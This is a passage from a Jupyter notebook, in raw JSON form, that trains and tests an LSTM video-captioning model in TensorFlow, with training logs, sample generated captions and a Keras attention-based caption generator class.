is present in chosen vocabulary\n else:\n curr_cap.append(word_to_id['<UNK>']) # word not present in chosen vocabulary\n caps.append(curr_cap)\n #print('Caption_Length:',len(caps[0]))\n return np.array(caps),np.array(cap_masks)", "_____no_output_____" ] ], [ [ "### Train Test Validation Split", "_____no_output_____" ] ], [ [ "## Get the list of the files we have extracted features\nimport os\nfrom sklearn.model_selection import train_test_split\n\nvideo_list = os.listdir('./DATA/features')\nvideos = []\nfor item in video_list:\n videos.append(item.split('-')[0])\n\nvideo_train, video_test = train_test_split(videos, test_size=0.1, random_state=42)\nvideo_train, video_val = train_test_split(video_train, test_size=0.1, random_state=42)", "_____no_output_____" ], [ "print('Training Videos -', len(video_train))\nprint('Testing Videos -', len(video_test))\nprint('Validation Videos -', len(video_val))", "Training Videos - 5890\nTesting Videos - 728\nValidation Videos - 655\n" ] ], [ [ "### Auxillary functions to handle model build", "_____no_output_____" ] ], [ [ "import numpy as np\nimport tensorflow as tf\nimport glob\nimport cv2\nimport imageio\nimport pickle\nnp.random.seed(0)\n#Global initializations\nn_lstm_steps = 30\nDATA_DIR = './DATA/'\nVIDEO_DIR = DATA_DIR + 'features/'\nYOUTUBE_CLIPS_DIR = DATA_DIR + 'videos/'\nTEXT_DIR = DATA_DIR+'word_features/'\npkl_file = open('./DATA/word_features/captions.pkl', 'rb')\nsentences = pickle.load(pkl_file)\npkl_file.close()\nword_counts,unk_required = build_vocab(0)\nword2id,id2word = word_to_word_ids(word_counts,unk_required, len(word_counts.keys()))\nvideo_files = video_train\nval_files = video_val\n\nprint (\"{0} files processed\".format(len(video_files)))\n\ndef get_bias_vector():\n \"\"\"Function to return the initialization for the bias vector\n for mapping from hidden_dim to vocab_size.\n Borrowed from neuraltalk by Andrej Karpathy\"\"\"\n bias_init_vector = np.array([1.0*word_counts[id2word[i]] for i in 
range(len(id2word))])\n bias_init_vector /= np.sum(bias_init_vector) # normalize to frequencies\n bias_init_vector = np.log(bias_init_vector)\n bias_init_vector -= np.max(bias_init_vector)\n return bias_init_vector\n\ndef fetch_data_batch(batch_size):\n \"\"\"Function to fetch a batch of video features, captions and caption masks\n Input:\n batch_size: Size of batch to load\n Output:\n curr_vids: Features of the randomly selected batch of video_files\n curr_caps: Ground truth (padded) captions for the selected videos\n curr_masks: Mask for the pad locations in curr_caps\"\"\"\n curr_batch_vids = np.random.choice(video_files,batch_size)\n curr_vids = np.array([np.load(VIDEO_DIR + vid+'-30-features' + '.npy') for vid in curr_batch_vids])\n captions = [np.random.choice(sentences[int(vid[5:])],1)[0]['caption'] for vid in curr_batch_vids]\n curr_caps,curr_masks = convert_caption(captions,word2id,n_lstm_steps)\n return curr_vids,curr_caps,curr_masks\n\ndef fetch_data_batch_val(batch_size):\n \"\"\"Function to fetch a batch of video features from the validation set and its captions.\n Input:\n batch_size: Size of batch to load\n Output:\n curr_vids: Features of the randomly selected batch of video_files\n curr_caps: Ground truth (padded) captions for the selected videos\"\"\"\n\n curr_batch_vids = np.random.choice(val_files,batch_size)\n curr_vids = np.array([np.load(VIDEO_DIR +vid+'-30-features' + '.npy') for vid in curr_batch_vids])\n captions = [np.random.choice(sentences[int(vid[5:])],1)[0]['caption'] for vid in curr_batch_vids]\n curr_caps,curr_masks = convert_caption(captions,word2id,n_lstm_steps)\n return curr_vids,curr_caps,curr_masks, curr_batch_vids\n\n\ndef print_in_english(caption_idx):\n \"\"\"Function to take a list of captions with words mapped to ids and\n print the captions after mapping word indices back to words.\"\"\"\n captions_english = [[id2word[word] for word in caption] for caption in caption_idx]\n for i,caption in enumerate(captions_english):\n 
if '<EOS>' in caption:\n caption = caption[0:caption.index('<EOS>')]\n print (str(i+1) + ' ' + ' '.join(caption))\n print ('..................................................')\n\ndef playVideo(video_urls):\n video = imageio.get_reader(YOUTUBE_CLIPS_DIR + video_urls[0] + '.mp4','ffmpeg')\n for frame in video:\n fr = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n cv2.imshow('frame',fr)\n if cv2.waitKey(40) & 0xFF == ord('q'):\n break\n cv2.destroyAllWindows()", "2\n2 a\n5890 files processed\n" ], [ "print(len(word2id))", "20001\n" ], [ "tmp_val = 'video3707'\nnp.random.choice(sentences[int(tmp_val[5:])],1)[0]['caption']", "_____no_output_____" ], [ "tdata = np.load(VIDEO_DIR+'video0-30-features.npy')\ntdata.shape", "_____no_output_____" ], [ "len(word_counts.keys())", "_____no_output_____" ], [ "print(id2word[0], word2id['a'])", "<EOS> 1\n" ] ], [ [ "### Build the model to train", "_____no_output_____" ] ], [ [ "import numpy as np\nimport tensorflow as tf\nimport sys\n#GLOBAL VARIABLE INITIALIZATIONS TO BUILD MODEL\nn_steps = 30\nhidden_dim = 500\nframe_dim = 2048\nbatch_size = 1\nvocab_size = len(word2id)\nbias_init_vector = get_bias_vector()\nn_steps_vocab = 30\n\ndef build_model():\n \"\"\"This function creates weight matrices that transform:\n * frames to caption dimension\n * hidden state to vocabulary dimension\n * creates word embedding matrix \"\"\"\n\n print (\"Network config: \\nN_Steps: {}\\nHidden_dim:{}\\nFrame_dim:{}\\nBatch_size:{}\\nVocab_size:{}\\n\".format(n_steps,\n hidden_dim,\n frame_dim,\n batch_size,\n vocab_size))\n\n #Create placeholders for holding a batch of videos, captions and caption masks\n video = tf.placeholder(tf.float32,shape=[batch_size,n_steps,frame_dim],name='Input_Video')\n caption = tf.placeholder(tf.int32,shape=[batch_size,n_steps_vocab],name='GT_Caption')\n caption_mask = tf.placeholder(tf.float32,shape=[batch_size,n_steps_vocab],name='Caption_Mask')\n dropout_prob = tf.placeholder(tf.float32,name='Dropout_Keep_Probability')\n\n 
with tf.variable_scope('Im2Cap') as scope:\n W_im2cap = tf.get_variable(name='W_im2cap',shape=[frame_dim,\n hidden_dim],\n initializer=tf.random_uniform_initializer(minval=-0.08,maxval=0.08))\n b_im2cap = tf.get_variable(name='b_im2cap',shape=[hidden_dim],\n initializer=tf.constant_initializer(0.0))\n with tf.variable_scope('Hid2Vocab') as scope:\n W_H2vocab = tf.get_variable(name='W_H2vocab',shape=[hidden_dim,vocab_size],\n initializer=tf.random_uniform_initializer(minval=-0.08,maxval=0.08))\n b_H2vocab = tf.Variable(name='b_H2vocab',initial_value=bias_init_vector.astype(np.float32))\n\n with tf.variable_scope('Word_Vectors') as scope:\n word_emb = tf.get_variable(name='Word_embedding',shape=[vocab_size,hidden_dim],\n initializer=tf.random_uniform_initializer(minval=-0.08,maxval=0.08))\n print (\"Created weights\")\n\n #Build two LSTMs, one for processing the video and another for generating the caption\n with tf.variable_scope('LSTM_Video',reuse=None) as scope:\n lstm_vid = tf.nn.rnn_cell.BasicLSTMCell(hidden_dim)\n lstm_vid = tf.nn.rnn_cell.DropoutWrapper(lstm_vid,output_keep_prob=dropout_prob)\n with tf.variable_scope('LSTM_Caption',reuse=None) as scope:\n lstm_cap = tf.nn.rnn_cell.BasicLSTMCell(hidden_dim)\n lstm_cap = tf.nn.rnn_cell.DropoutWrapper(lstm_cap,output_keep_prob=dropout_prob)\n\n #Prepare input for lstm_video\n video_rshp = tf.reshape(video,[-1,frame_dim])\n video_rshp = tf.nn.dropout(video_rshp,keep_prob=dropout_prob)\n video_emb = tf.nn.xw_plus_b(video_rshp,W_im2cap,b_im2cap)\n video_emb = tf.reshape(video_emb,[batch_size,n_steps,hidden_dim])\n padding = tf.zeros([batch_size,n_steps-1,hidden_dim])\n video_input = tf.concat([video_emb,padding],1)\n #video_input=video_emb\n print (\"Video_input: {}\".format(video_input.get_shape()))\n #Run lstm_vid for 2*n_steps-1 timesteps\n with tf.variable_scope('LSTM_Video') as scope:\n out_vid,state_vid = tf.nn.dynamic_rnn(lstm_vid,video_input,dtype=tf.float32)\n print (\"Video_output: 
{}\".format(out_vid.get_shape()))\n\n #Prepare input for lstm_cap\n padding = tf.zeros([batch_size,n_steps_vocab,hidden_dim])\n caption_vectors = tf.nn.embedding_lookup(word_emb,caption[:,0:n_steps_vocab-1])\n caption_vectors = tf.nn.dropout(caption_vectors,keep_prob=dropout_prob)\n caption_2n = tf.concat([padding,caption_vectors],1)\n #caption_2n = caption_vectors\n caption_input = tf.concat([caption_2n,out_vid],2)\n print (\"Caption_input: {}\".format(caption_input.get_shape()))\n #Run lstm_cap for 2*n_steps-1 timesteps\n with tf.variable_scope('LSTM_Caption') as scope:\n out_cap,state_cap = tf.nn.dynamic_rnn(lstm_cap,caption_input,dtype=tf.float32)\n print (\"Caption_output: {}\".format(out_cap.get_shape()))\n\n #Compute masked loss\n output_captions = out_cap[:,n_steps_vocab:,:]\n output_logits = tf.reshape(output_captions,[-1,hidden_dim])\n output_logits = tf.nn.dropout(output_logits,keep_prob=dropout_prob)\n output_logits = tf.nn.xw_plus_b(output_logits,W_H2vocab,b_H2vocab)\n output_labels = tf.reshape(caption[:,1:],[-1])\n caption_mask_out = tf.reshape(caption_mask[:,1:],[-1])\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=output_logits,labels=output_labels)\n masked_loss = loss*caption_mask_out\n loss = tf.reduce_sum(masked_loss)/tf.reduce_sum(caption_mask_out)\n return video,caption,caption_mask,output_logits,loss,dropout_prob\n\ndb1 = None\ndb2 = None\ndb3 = None\ndef train():\n global db1,db2,db3\n with tf.Graph().as_default():\n learning_rate = 0.0001\n video,caption,caption_mask,output_logits,loss,dropout_prob = build_model()\n optim = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(loss)\n nEpoch = 300\n nIter = int(nEpoch*6000/batch_size)\n \n ckpt_file = './ckpt_v4/model_58000.ckpt.meta'\n\n saver = tf.train.Saver()\n with tf.Session() as sess:\n if ckpt_file:\n saver_ = tf.train.import_meta_graph(ckpt_file)\n saver_.restore(sess,'./ckpt_v4/model_58000.ckpt')\n print (\"Restored model\")\n else:\n 
sess.run(tf.global_variables_initializer())\n for i in range(nIter):\n #print(i)\n vids,caps,caps_mask = fetch_data_batch(batch_size=batch_size)\n db1,db2,db3 = vids, caps, caps_mask\n #print(type(vids),type(caps), type(caps_mask))\n #print(vids,caps, caps_mask)\n _,curr_loss,o_l = sess.run([optim,loss,output_logits],feed_dict={video:vids,\n caption:caps,\n caption_mask:caps_mask,\n dropout_prob:0.5})\n\n if i%1000 == 0:\n print (\"\\nIteration {} \\n\".format(i))\n out_logits = o_l.reshape([batch_size,n_steps_vocab-1,vocab_size])\n output_captions = np.argmax(out_logits,2)\n #print_in_english(output_captions[0:4])\n #print (\"GT Captions\")\n #print_in_english(caps[0:4])\n print (\"Current train loss: {} \".format(curr_loss))\n vids,caps,caps_mask,_ = fetch_data_batch_val(batch_size=batch_size)\n db1,db2,db3 = vids,caps,caps_mask\n curr_loss,o_l = sess.run([loss,output_logits],feed_dict={video:vids,\n caption:caps,\n caption_mask:caps_mask,\n dropout_prob:1.0})\n out_logits = o_l.reshape([batch_size,n_steps_vocab-1,vocab_size])\n output_captions = np.argmax(out_logits,2)\n print_in_english(output_captions[0:2])\n print (\"GT Captions\")\n print_in_english(caps[0:2])\n print (\"Current validation loss: {} \".format(curr_loss))\n\n if i%2000 == 0:\n saver.save(sess,'./ckpt_v5/model_'+str(i)+'.ckpt')\n print ('Saved {}'.format(i))", "_____no_output_____" ] ], [ [ "### Training Begins !!!", "_____no_output_____" ] ], [ [ "train()", "Network config: \nN_Steps: 30\nHidden_dim:500\nFrame_dim:2048\nBatch_size:30\nVocab_size:29325\n\nCreated weights\nVideo_input: (30, 59, 500)\nVideo_output: (30, 59, 500)\nCaption_input: (30, 59, 1000)\nCaption_output: (30, 59, 500)\nINFO:tensorflow:Restoring parameters from ./ckpt_v4/model_58000.ckpt\nRestored model\n\nIteration 0 \n\nCurrent train loss: 5.710939407348633 \n1 man are <BOS>\n..................................................\n2 man men are <BOS> <BOS> on on <BOS>\n..................................................\nGT 
Captions\n1 <BOS> men drawing guns and then football player playing\n..................................................\n2 <BOS> two men driving a ferrari\n..................................................\nCurrent validation loss: 6.091744422912598 \nSaved 0\n\nIteration 1000 \n\nCurrent train loss: 3.989447593688965 \n1 a are a\n..................................................\n2 a are on a\n..................................................\nGT Captions\n1 <BOS> montage of baseball players celebrating to intense music\n..................................................\n2 <BOS> people working on engines\n..................................................\nCurrent validation loss: 3.8030765056610107 \n\nIteration 2000 \n\nCurrent train loss: 4.344245910644531 \n1 a man is a guitar\n..................................................\n2 a old man is about the\n..................................................\nGT Captions\n1 <BOS> a man playing a guitar\n..................................................\n2 <BOS> an old man talks about cats\n..................................................\nCurrent validation loss: 4.4142632484436035 \nSaved 2000\n\nIteration 3000 \n\nCurrent train loss: 3.8703577518463135 \n1 two men are wrestling\n..................................................\n2 a man is with game\n..................................................\nGT Captions\n1 <BOS> two guys are wrestling in a competition\n..................................................\n2 <BOS> a boy playing the piano\n..................................................\nCurrent validation loss: 4.140491962432861 \n\nIteration 4000 \n\nCurrent train loss: 3.676469087600708 \n1 a woman is is and a\n..................................................\n2 a man is a cartoon\n..................................................\nGT Captions\n1 <BOS> a person slices potatoes into smaller pieces\n..................................................\n2 <BOS> a man in the rain looking at a 
rock\n..................................................\nCurrent validation loss: 3.797583818435669 \nSaved 4000\n\nIteration 5000 \n\nCurrent train loss: 4.081212997436523 \n1 a man is a news show\n..................................................\n2 a is a man is shown about the people\n..................................................\nGT Captions\n1 <BOS> a man read the tv flash news and market rates\n..................................................\n2 <BOS> hero of the film is talking to some girls very seriously and the girl listens carefully\n..................................................\nCurrent validation loss: 4.362054824829102 \n\nIteration 6000 \n\nCurrent train loss: 4.080102443695068 \n1 a person is cooking food cooking\n..................................................\n2 a boy are with house\n..................................................\nGT Captions\n1 <BOS> a person is peeling and mashing cooked poatoes\n..................................................\n2 <BOS> the kids play the theft and police\n..................................................\nCurrent validation loss: 3.6474521160125732 \nSaved 6000\n\nIteration 7000 \n\nCurrent train loss: 4.0086588859558105 \n1 a women are are at a men men\n..................................................\n2 a man is is being a and and and and\n..................................................\nGT Captions\n1 <BOS> two bored women look at two other women who are excitedly speaking\n..................................................\n2 <BOS> a quad chopter is delivering drinks\n..................................................\nCurrent validation loss: 4.521246910095215 \n\nIteration 8000 \n\nCurrent train loss: 4.09481143951416 \n1 a are on a chair room\n..................................................\n2 two men are are wrestling\n..................................................\nGT Captions\n1 <BOS> men sitting in a locker room 
talking\n..................................................\n2 <BOS> two man s are fighting with each other on the ground\n..................................................\nCurrent validation loss: 4.40539026260376 \nSaved 8000\n\nIteration 9000 \n\nCurrent train loss: 3.190986394882202 \n1 a talking about news of\n..................................................\n2 a man is talking about\n..................................................\nGT Captions\n1 <BOS> man discussing the swastica s on each man\n..................................................\n2 <BOS> a man is talking\n..................................................\nCurrent validation loss: 4.049018859863281 \n\nIteration 10000 \n\nCurrent train loss: 3.836989164352417 \n1 a man man is is is is a on a animated\n..................................................\n2 a man is a is is a and\n..................................................\nGT Captions\n1 <BOS> a first person shooter game that takes place in an outdoor area\n..................................................\n2 <BOS> a sticker of biker man\n..................................................\nCurrent validation loss: 3.7681522369384766 \nSaved 10000\n\nIteration 11000 \n\nCurrent train loss: 3.4665136337280273 \n1 a man is a blue of shirt is walking down the road road\n..................................................\n2 a girl playing are playing to playing is playing\n..................................................\nGT Captions\n1 <BOS> a woman in a lime green shirt is running down a dirt road through the forest\n..................................................\n2 <BOS> three barbie dolls are talking while one is examining the foot of one of the dolls to see if it is hurt\n..................................................\nCurrent validation loss: 3.5693869590759277 \n\nIteration 12000 \n\nCurrent train loss: 3.8586039543151855 \n1 a cartoon animals a animals\n..................................................\n2 a man of 
on song\n..................................................\nGT Captions\n1 <BOS> animated cartoon with sick monkey\n..................................................\n2 <BOS> a group performing a show\n..................................................\nCurrent validation loss: 4.297967433929443 \nSaved 12000\n\nIteration 13000 \n\nCurrent train loss: 3.591733694076538 \n1 a man man is being on a kitchen\n..................................................\n2 a girl girl is a talking a hair\n..................................................\nGT Captions\n1 <BOS> a shirtless teenager is working in the kitchen and commenting upon his actions\n..................................................\n2 <BOS> a young woman washing and combing her hair\n..................................................\nCurrent validation loss: 4.377688884735107 \n\nIteration 14000 \n\nCurrent train loss: 3.4024927616119385 \n1 a man is being played\n..................................................\n2 a small is walking around the stairs and\n..................................................\nGT Captions\n1 <BOS> a game is been played by the person in his computer\n..................................................\n2 <BOS> a person is walking down some steep stairs with heavy plant growth to the sides\n..................................................\nCurrent validation loss: 3.9335079193115234 \nSaved 14000\n\nIteration 15000 \n\nCurrent train loss: 3.353208303451538 \n1 a is how to use a\n..................................................\n2 a man is showing on a and on\n..................................................\nGT Captions\n1 <BOS> woman showing how to keep things in the new product\n..................................................\n2 <BOS> a person is working with yellow twine wrapped around their hand\n..................................................\nCurrent validation loss: 3.9493484497070312 \n\nIteration 16000 \n\nCurrent train loss: 3.4370555877685547 \n" ] ], 
[ [ "### Testing", "_____no_output_____" ] ], [ [ "def test():\n with tf.Graph().as_default():\n learning_rate = 0.00001\n video,caption,caption_mask,output_logits,loss,dropout_prob = build_model()\n optim = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(loss)\n ckpt_file = './ckpt_v5/model_58000.ckpt.meta'\n saver = tf.train.Saver()\n with tf.Session() as sess:\n if ckpt_file:\n saver_ = tf.train.import_meta_graph(ckpt_file)\n saver_.restore(sess,'./ckpt_v5/model_58000.ckpt')\n print (\"Restored model\")\n else:\n sess.run(tf.initialize_all_variables())\n while(1):\n vid,caption_GT,_,current_batch_vids = fetch_data_batch_val(1)\n caps,caps_mask = convert_caption(['<BOS>'],word2id,30)\n\n for i in range(30):\n o_l = sess.run(output_logits,feed_dict={video:vid,\n caption:caps,\n caption_mask:caps_mask,\n dropout_prob:1.0})\n out_logits = o_l.reshape([batch_size,n_steps-1,vocab_size])\n output_captions = np.argmax(out_logits,2)\n caps[0][i+1] = output_captions[0][i]\n print_in_english(caps)\n if id2word[output_captions[0][i]] == '<EOS>':\n break\n print ('............................\\nGT Caption:\\n')\n print_in_english(caption_GT)\n play_video = input('Should I play the video? ')\n if play_video.lower() == 'y':\n playVideo(current_batch_vids)\n test_again = input('Want another test run? 
')\n if test_again.lower() == 'n':\n break\ntest()", "Network config: \nN_Steps: 30\nHidden_dim:500\nFrame_dim:2048\nBatch_size:1\nVocab_size:29325\n\nCreated weights\nVideo_input: (1, 59, 500)\nVideo_output: (1, 59, 500)\nCaption_input: (1, 59, 1000)\nCaption_output: (1, 59, 500)\nINFO:tensorflow:Restoring parameters from ./ckpt_v5/model_58000.ckpt\nRestored model\n1 <BOS> a\n..................................................\n1 <BOS> a person\n..................................................\n1 <BOS> a person is\n..................................................\n1 <BOS> a person is cooking\n..................................................\n1 <BOS> a person is cooking a\n..................................................\n1 <BOS> a person is cooking a dish\n..................................................\n1 <BOS> a person is cooking a dish in\n..................................................\n1 <BOS> a person is cooking a dish in a\n..................................................\n1 <BOS> a person is cooking a dish in a pot\n..................................................\n1 <BOS> a person is cooking a dish in a pot\n..................................................\n............................\nGT Caption:\n\n1 <BOS> a woman shows a mixing technique\n..................................................\nShould I play the video? n\nWant another test run? 
y\n1 <BOS> a\n..................................................\n1 <BOS> a woman\n..................................................\n1 <BOS> a woman is\n..................................................\n1 <BOS> a woman is talking\n..................................................\n1 <BOS> a woman is talking about\n..................................................\n1 <BOS> a woman is talking about her\n..................................................\n1 <BOS> a woman is talking about her hair\n..................................................\n1 <BOS> a woman is talking about her hair\n..................................................\n............................\nGT Caption:\n\n1 <BOS> the food is placed in the plate while the woman on white sofa is talking\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a man\n..................................................\n1 <BOS> a man is\n..................................................\n1 <BOS> a man is talking\n..................................................\n1 <BOS> a man is talking about\n..................................................\n1 <BOS> a man is talking about a\n..................................................\n1 <BOS> a man is talking about a video\n..................................................\n1 <BOS> a man is talking about a video game\n..................................................\n1 <BOS> a man is talking about a video game\n..................................................\n............................\nGT Caption:\n\n1 <BOS> a diglett fights a voltorb in an epic pokemon battle\n..................................................\nShould I play the video? n\nWant another test run? 
y\n1 <BOS> a\n..................................................\n1 <BOS> a man\n..................................................\n1 <BOS> a man and\n..................................................\n1 <BOS> a man and a\n..................................................\n1 <BOS> a man and a woman\n..................................................\n1 <BOS> a man and a woman are\n..................................................\n1 <BOS> a man and a woman are walking\n..................................................\n1 <BOS> a man and a woman are walking in\n..................................................\n1 <BOS> a man and a woman are walking in a\n..................................................\n1 <BOS> a man and a woman are walking in a park\n..................................................\n1 <BOS> a man and a woman are walking in a park\n..................................................\n............................\nGT Caption:\n\n1 <BOS> a group of children are playing in the forest while a man sings\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a man\n..................................................\n1 <BOS> a man is\n..................................................\n1 <BOS> a man is talking\n..................................................\n1 <BOS> a man is talking about\n..................................................\n1 <BOS> a man is talking about a\n..................................................\n1 <BOS> a man is talking about a dog\n..................................................\n1 <BOS> a man is talking about a dog\n..................................................\n............................\nGT Caption:\n\n1 <BOS> a large spider is crawling on a white wall\n..................................................\nShould I play the video? n\nWant another test run? 
y\n1 <BOS> a\n..................................................\n1 <BOS> a man\n..................................................\n1 <BOS> a man is\n..................................................\n1 <BOS> a man is talking\n..................................................\n1 <BOS> a man is talking to\n..................................................\n1 <BOS> a man is talking to a\n..................................................\n1 <BOS> a man is talking to a woman\n..................................................\n1 <BOS> a man is talking to a woman\n..................................................\n............................\nGT Caption:\n\n1 <BOS> youtubers react to shia labouf the musical\n..................................................\nShould I play the video? n\nWant another test run? y\n1 <BOS> a\n..................................................\n1 <BOS> a woman\n..................................................\n1 <BOS> a woman is\n..................................................\n1 <BOS> a woman is singing\n..................................................\n1 <BOS> a woman is singing\n..................................................\n............................\nGT Caption:\n\n1 <BOS> an older man sheds tears of joy while a young woman sings a song to a large audience\n..................................................\nShould I play the video? n\nWant another test run? 
n\n" ] ], [ [ "### Attention", "_____no_output_____" ] ], [ [ " coding: utf-8\n\n# In[1]:\n\nimport tensorflow as tf\nimport numpy as np\nimport json\nimport os\n\nfrom keras.layers.embeddings import Embedding\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Input, GRU, Dropout\nfrom keras.optimizers import RMSprop\nfrom keras.layers.wrappers import TimeDistributed\nfrom keras.preprocessing import sequence\nfrom keras.models import Model\nfrom keras import backend as K\nfrom keras.utils import np_utils\nfrom keras.callbacks import ModelCheckpoint\n\nfrom Attention import Attention_Layer\nfrom Multimodel_layer import Multimodel_Layer\n\n\n# In[2]:\n\nclass Caption_Generator:\n \n def __init__(self):\n self.captions = []\n self.captions_in_each_video = []\n self.word2id = {}\n self.id2word = {}\n self.max_sentence_length = 0\n self.vocabulary_size = 0\n self.batch_size = 25\n self.embedding_output_shape = 512\n \n ################################################################################################\n def read_data(self, n_batch):\n print \"loading Data for new Batch... 
\"\n files = [] \n \n #reading captions\n with open('MLDS_HW2/MLDS_hw2_data/training_label.json') as data_file:\n training_labels = json.load(data_file)\n \n \n self.captions_in_each_video = []\n for i in n_batch:\n files.append(training_labels[i]['id'])\n for j in range(len(training_labels[i]['caption'])):\n training_labels[i]['caption'][j] = \"<s> \"+training_labels[i]['caption'][j]+\" <e>\" \n self.captions.append(training_labels[i]['caption'][j].lower().split(' '))\n self.captions_in_each_video.append(len(training_labels[i]['caption']))\n\n \n #reading video features\n video_features = np.zeros((len(files),80,4096))\n \n video_features[0] = np.load(\"MLDS_HW2/MLDS_hw2_data/training_data/feat/\"+files[0]+\".npy\")\n\n for i in range(1,len(files)):\n video_features[i] = np.load(\"MLDS_HW2/MLDS_hw2_data/training_data/feat/\"+files[i]+\".npy\")\n \n print \"Data Loaded Successfully.....\"\n\n return video_features\n ################################################################################################\n def create_vocabulary(self):\n\n print \"creating vocabulary...\"\n labels = []\n with open('MLDS_HW2/MLDS_hw2_data/training_label.json') as data_file:\n training_labels = json.load(data_file)\n \n for i in range(len(training_labels)):\n for j in range(len(training_labels[i]['caption'])):\n training_labels[i]['caption'][j] = \"<s> \"+training_labels[i]['caption'][j]+\" <e>\" \n labels.append(training_labels[i]['caption'][j].lower().split(' '))\n \n self.max_sentence_length = 1 + max([len(caption) for caption in labels])\n print(\"\\t Max sentence length : \", self.max_sentence_length)\n \n #computing char2id and id2char vocabulary\n index = 0\n for caption in labels:\n for word in caption:\n if word not in self.word2id:\n self.word2id[word] = index\n self.id2word[index] = word\n index += 1\n \n \n self.vocabulary_size = len(self.word2id)\n \n \n \n ################################################################################################\n def 
transform_inputs(self, video_features):\n #transforming the no of samples of video features equal to no of samples of captions\n new_features = np.zeros((len(self.captions), 80, 4096))\n for i in range(len(self.captions_in_each_video)):\n for j in range(self.captions_in_each_video[i]):\n new_features[j] = video_features[i]\n \n return new_features\n \n \n ################################################################################################\n def one_of_N_encoding(self): \n print(\"encoding inputs...\") \n #creating caption tensor that is a matrix of size numCaptions x maximumSentenceLength x wordVocabularySize\n encoded_tensor = np.zeros((len(self.captions), self.max_sentence_length, self.vocabulary_size), dtype=np.float16)\n label_tensor = np.zeros((len(self.captions), self.max_sentence_length, self.vocabulary_size), dtype =np.float16)\n #one-hot-encoding\n for i in range(len(self.captions)):\n for j in range(len(self.captions[i])):\n encoded_tensor[i, j, self.word2id[self.captions[i][j]]] = 1\n if j<len(self.captions[i])-1:\n label_tensor[i,j,self.word2id[self.captions[i][j+1]]] = 1\n \n return encoded_tensor, label_tensor\n \n ################################################################################################\n def embedding_layer(self, input_data):\n print(\"embedding inputs....\")\n model = Sequential()\n model.add(Dense(self.embedding_output_shape, input_shape = (self.max_sentence_length, self.vocabulary_size)))\n model.add(Activation('relu'))\n model.compile('rmsprop','mse')\n embedding_weights = model.get_weights()\n output_array = model.predict(input_data)\n self.embedding_weights = model.get_weights()\n output_weights = np.asarray(self.embedding_weights[0]).T\n self.embedding_weights[0] = output_weights\n self.embedding_weights[1] = np.ones((self.vocabulary_size,))\n return output_array\n \n ################################################################################################\n def data_preprocessing(self, n_batch):\n 
#########################Preprocessing Data##############################\n #print(\"Data Preprocessing.......\")\n #print(\"\\tReading data.......\")\n video_features = self.read_data(n_batch)\n video_features = self.transform_inputs(video_features)\n #print(\"\\tvideo features : \",video_features.shape)\n #print(\"\\tCaptions : \", len(self.captions))\n #print(\"\\tCreating Vocabulary......\")\n #self.create_vocabulary()\n\n # one-hot encoding of captions\n #print(\"\\tEncoding Captions......\")\n encoded_tensor, label_tensor = self.one_of_N_encoding()\n #print(\"\\tEncoded Captions : \",encoded_tensor.shape)\n\n # embedding the one-hot encoding of each word into 512\n #print(\"\\tEmbedding Captions.......\")\n embedded_input = self.embedding_layer(encoded_tensor)\n\n #print(\"\\tEmbedding Weights : \", np.asarray(self.embedding_weights[0]).shape)\n\n #print(\"\\tEmbedded_captions : \",embedded_input.shape)\n \n return video_features, embedded_input, label_tensor\n \n ################################################################################################ \n def build_model(self, video_features, embedded_input):\n #########################training model##################################\n print('Building Sentence Generator Model...')\n\n input1 = Input(shape=(embedded_input.shape[1],embedded_input.shape[2]), dtype='float32')\n #input2 = Input(shape=(visual_features.shape[0],visual_features.shape[1]), dtype='float32')\n input2 = Input(shape=(video_features.shape[1], video_features.shape[2]), dtype='float32')\n \n model = Sequential()\n \n layer1 = GRU(512, return_sequences = True, input_shape = (embedded_input.shape[1],embedded_input.shape[2]), activation = 'relu')(input1)\n \n attention_layer = Attention_Layer(output_dim = 32)([layer1, input2])\n\n multimodel_layer = Multimodel_Layer(output_dim = 1024)([layer1,attention_layer])\n\n dropout = Dropout(0.5)(multimodel_layer)\n\n layer2 = TimeDistributed(Dense(activation = 'tanh', units = 512))(dropout)\n\n 
softmax_layer = Dense(units = self.vocabulary_size, activation = 'softmax', weights = self.embedding_weights)(layer2)\n \n model = Model(inputs = [input1, input2], outputs = [softmax_layer])\n \n '''\n # We also specify here the optimization we will use, in this case we use RMSprop with learning rate 0.001.\n # RMSprop is commonly used for RNNs instead of regular SGD.\n # categorical_crossentropy is the same loss used for classification problems using softmax. (nn.ClassNLLCriterion)\n '''\n model.compile(loss = 'categorical_crossentropy', optimizer = RMSprop(lr=0.001))\n\n print(model.summary()) # Convenient function to see details about the network model.\n\n return model\n \n ################################################################################################ \n def train(self): \n \n batches = np.arange(1450)\n #########################training model##################################\n for epoch in range(10):\n print \"\\n\\n\\nEpoch : \",epoch+1\n np.random.shuffle(batches)\n batch = 0\n for iteration in range(1450/self.batch_size):\n if batch+self.batch_size >= 1450:\n n_batch = batches[batch:-1]\n else: \n n_batch = batches[batch:(batch+self.batch_size)]\n batch += self.batch_size\n self.captions = []\n video_features, embedded_input, label_tensor = self.data_preprocessing(n_batch)\n if(iteration == 0 and epoch == 0):\n model = caption_generator.build_model(video_features, embedded_input)\n # define the checkpoint\n filepath=\"Sentence_Generator_Model_Results/word-weights-improvement-{epoch:02d}-{loss:.4f}.hdf5\"\n checkpoint = ModelCheckpoint(filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')\n callbacks_list = [checkpoint]\n\n print\"\\n\\n###########Training the model on epoch : \", epoch+1, \" batch : \", iteration+1 ,\" ###########\\n\\n\"\n model.fit(x = [embedded_input,video_features], y = label_tensor, batch_size = 256, epochs= 5, callbacks = callbacks_list)\n self.save_model(model,epoch)\n \n \n return model\n \n 
